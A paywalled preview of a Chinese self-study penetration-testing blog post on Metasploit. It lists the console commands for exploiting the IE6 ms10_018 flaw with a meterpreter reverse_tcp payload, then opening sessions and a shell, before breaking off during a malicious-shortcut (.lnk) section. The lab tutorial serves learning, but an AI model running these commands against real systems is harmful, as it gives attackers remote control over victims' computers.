超级会员免费看
本文介绍作者在自学渗透测试过程中,利用Metasploit(msf)进行漏洞利用的一些基本操作,包括利用IE6的ms10_018漏洞启动msf、选择模块、设置payload并诱导目标主机访问特定链接实现远程控制;利用快捷方式漏洞欺骗系统加载恶意dll;通过msf进行telnet弱口令爆破;以及如何生成并利用msfvenom创建的木马文件监听被攻击机。
本文章为作者渗透测试自学系列文章,所有内容仅作为个人学习实验使用,请勿用于实战环境。
msf利用浏览器漏洞渗透
这里利用IE6和漏洞ms10_018
原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。
msfconsole启动msf
search ms10_018查看相关漏洞
use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块
set LHOST 192.168.223.140
set URIPATH test
set PAYLOAD windows/meterpreter/reverse_tcp设置payload模块
set SRVHOST 192.168.223.140设置反弹到的ip
exploit
生成网页链接,被攻击机使用ie有浏览器漏洞访问这个链接后,kali中显示攻击成功,
sessions -l 查看会话
seesions -i id 选择id
shell命令转到被攻击机的终端中,可以进行相关操作。
msf利用快捷方式漏洞
原理: 利用系统解析后缀名的机制,恶意构造一个lnk(快捷方式)的文件,并构造一串程序代码来欺骗操作系统,的那个shell32.dll解析到这串编码的时候&#x
订阅专栏 解锁全文
552
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
